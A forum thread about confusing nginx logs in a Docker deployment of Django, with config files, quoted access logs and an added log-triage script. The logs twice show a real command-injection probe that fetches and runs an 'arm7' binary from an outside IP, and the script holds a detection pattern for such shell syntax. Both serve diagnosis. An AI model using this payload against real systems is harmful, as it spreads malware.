nginx logs seem to show the wrong information

Time: 2020-04-02 21:53:10

Tags: docker nginx

I am running nginx with Django on a production server using the following settings:

# normally you leave this at the default of 1024
events {
    worker_connections 1024;
}

http {
    # cf http://blog.maxcdn.com/accept-encoding-its-vary-important/
    gzip_vary on; 
    gzip_proxied any;
    gzip_types *;

    # http://nginx.org/en/docs/http/configuring_https_servers.html#optimization
    ssl_session_cache shared:SSL:1m;
    ssl_session_timeout 10m;

    server_tokens off;

    upstream django {
        server webapp:8000;
    }

    # ---------------------------------------------------------------------------
    # Production
    #
    # Use this configuration for a deployment. You'll have to configure SSL.
    # ---------------------------------------------------------------------------
    #server {
    #    # rewrite all HTTP to HTTPS
    #    listen 80;
    #    server_name ${NGINX_SERVER_NAME};
    #
    #    return 301 https://${NGINX_SERVER_NAME}${DOLLAR}request_uri;
    #}

    # ---------------------------------------------------------------------------
    # Development
    #
    # You may use this for development. It doesn't use SSL, making it unsafe.
    # Remove this setting when moving to production.
    # ---------------------------------------------------------------------------
    server {
        # rewrite all HTTP to HTTPS
        listen 80;
        server_name ${NGINX_SERVER_NAME};

        location /static {
            alias /srv/covidoff/static;

            # http://stackoverflow.com/q/19213510/1346257
            include /etc/nginx/mime.types;
        }

        location = /robots.txt { return 200 "User-agent: *\nAllow: /"; }
        location = /favicon.ico { access_log off; log_not_found off; return 404; }

        location / {
            uwsgi_pass      django;
            include         uwsgi_params;
        }
    }

    server {
        listen 443 ssl default_server;
        server_name ${NGINX_SERVER_NAME};

        # see http://nginx.org/en/docs/http/configuring_https_servers.html
        ssl_certificate /etc/ssl/certs/${NGINX_CRT_NAME}.crt;
        ssl_certificate_key /etc/ssl/private/${NGINX_KEY_NAME}.key;

        ssl_prefer_server_ciphers on;
        ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # ie defaults minus SSLv3

        location /static {
            alias /srv/covidoff/static;

            # http://stackoverflow.com/q/19213510/1346257
            include /etc/nginx/mime.types;
        }

        location = /robots.txt { return 200 "User-agent: *\nAllow: /"; }
        location = /favicon.ico { access_log off; log_not_found off; return 404; }

        location / {
            uwsgi_pass      django;
            include         uwsgi_params;
        }
    }
}

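Note: I know the setup shouldn't be like this, because it doesn't use HTTPS, but this is the setup we are currently using. It should be fixed later.

One thing that puzzles me is that the Docker setup I was given has two nginx configuration files; the other one is: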

server {

    listen 80;

    location / {
        proxy_pass http://localhost:8000;
        proxy_redirect off;
    }
}

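Worst of all, the docker compose yaml file seems to point to the second file rather than the first, yet the changes I make to the first file are reflected on the server.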

version: "3"

volumes:
  static-files:
    driver: local
  postgres:
    driver: local

services:
    db:
      image: postgres:11.1
      volumes:
        - postgres:/var/lib/postgresql/data/pgdata
      env_file:
        - ./config/environment/development.env
      expose:
        - "5432"

    webserver:
      build: ./nginx
      ports:
        - "80:80"
        - "443:443"

    webapp:
      build:
        context: webapp
      volumes:
        - ./webapp/covidoff:/srv/covidoff
        - static-files:/srv/static-files
      ports:
        - "8000:8000"
      depends_on:
        - db
      env_file:
        - ./config/environment/development.env

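You can see the full project here

I'm not too worried about the server configuration right now, but it may be relevant to what I'm about to point out.

After starting up (e.g. docker-compose up -d), I looked at the nginx logs, and they are... well... strange.

As you can see from the docker-compose file, I'm running three services: Django, nginx and Postgres. Using docker logs, I found that the Django service is being hit by requests frequently, but those requests do not show up on the nginx server.

Instead, nginx only shows things that I really don't know the origin of, such as requests for index.php: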

124.156.160.69 - - [02/Apr/2020:18:05:24 +0000] "GET /websql/index.php HTTP/1.1" 502 559 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" "-"

Or even GET /, when there is no such thing in the deployment:

202.52.58.6 - - [02/Apr/2020:18:35:50 +0000] "GET / HTTP/1.1" 502 157 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" "-"
95.70.169.166 - - [02/Apr/2020:19:36:19 +0000] "GET / HTTP/1.1" 400 157 "-" "-" "-"
186.64.111.98 - - [02/Apr/2020:19:36:51 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a HTTP/1.1" 400 157 "-" "-" "-"
2020/04/02 20:18:20 [error] 8#8: *2171 connect() failed (111: Connection refused) while connecting to upstream, client: 209.17.97.2, server: , request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:8000/", host: "34.242.160.202:80"
209.17.97.2 - - [02/Apr/2020:20:18:20 +0000] "GET / HTTP/1.1" 502 157 "-" "Mozilla/5.0 (compatible; Nimbostratus-Bot/v1.3.2; http://cloudsystemnetworks.com)" "-"

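What I need is a normal access.log with the requests that are hitting Django. I don't know what nginx's logs are showing, or where these requests come from.

In the nginx Docker container, if I run docker exec -it de807b6ad160 ls /var/log/nginx -la, I get: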

lrwxrwxrwx    1 root     root            11 Oct 21 19:02 access.log -> /dev/stdout
lrwxrwxrwx    1 root     root            11 Oct 21 19:02 error.log -> /dev/stderr

This means the log files are empty and are (correctly) redirected to stdout / stderr.

What am I missing?

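1 answer:

Answer 0: (score: 0)

Apparently, the call to /cgi-bin/mainfunction.cgi is an exploit used to create a remote login to the server. I just had the same call, and I'm running a different web server, namely Apache.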

200.188.153.18 - - [03/Apr/2020:11:03:34 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a HTTP/1.1" 400 0 "-" "-"

The only difference I see is the source IP and the response (400)
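
An added example, not part of the original question or answer: a small triage script for the two kinds of log line shown on this page. It labels access-log entries, including requests whose URL carries shell syntax such as `${IFS}`, and extracts from error-log entries the `upstream` address nginx actually tried to reach. The function names and labels are hypothetical, and the sample lines are constructed with documentation-range IP addresses.

```python
import re
from urllib.parse import unquote

# Access line: nginx "combined" format; extra trailing fields are ignored.
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>.*)" '
    r'(?P<status>\d{3}) \d+ "[^"]*" "[^"]*"'
)
# Error line: keep the client and the upstream address nginx tried to reach.
ERROR_RE = re.compile(
    r'\[error\].*client: (?P<ip>[^,]+),.*upstream: "(?P<upstream>[^"]+)"'
)
# Shell syntax that has no place in a request target (checked URL-decoded).
SHELL_RE = re.compile(r'\$\{IFS\}|/bin/(?:ba)?sh\b|\b(?:wget|busybox|chmod)\b')

def classify(line):
    """Return (client_ip, label, detail) for one log line, or None."""
    m = ERROR_RE.search(line)
    if m:
        return m["ip"], "upstream-error", m["upstream"]
    m = ACCESS_RE.match(line)
    if not m:
        return None
    parts = m["request"].split(" ")
    target = parts[1] if len(parts) == 3 else m["request"]
    if SHELL_RE.search(unquote(target)):
        label = "injection-probe"
    elif m["status"] == "502":
        label = "upstream-down"
    elif m["status"].startswith("4"):
        label = "rejected"
    else:
        label = "served"
    return m["ip"], label, target.split("?")[0]

def triage(lines):
    """Classify every recognisable line, skipping the rest."""
    return [r for r in map(classify, lines) if r is not None]

# Constructed sample lines in the formats shown above (documentation IPs).
SAMPLE = [
    '203.0.113.5 - - [02/Apr/2020:18:05:24 +0000] "GET /websql/index.php HTTP/1.1" 502 559 "-" "Mozilla/5.0" "-"',
    '198.51.100.7 - - [02/Apr/2020:19:36:51 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}true%0A%27 HTTP/1.1" 400 157 "-" "-" "-"',
    '2020/04/02 20:18:20 [error] 8#8: *1 connect() failed (111: Connection refused) while connecting to upstream, client: 203.0.113.9, server: , request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:8000/", host: "192.0.2.10:80"',
]

if __name__ == "__main__":
    for ip, label, detail in triage(SAMPLE):
        print(f"{ip:15} {label:16} {detail}")
```

An `upstream` of `http://...` comes from a `proxy_pass` block, whereas `uwsgi_pass` targets are logged as `uwsgi://...`, so this field tells which of two configuration files the running container loaded.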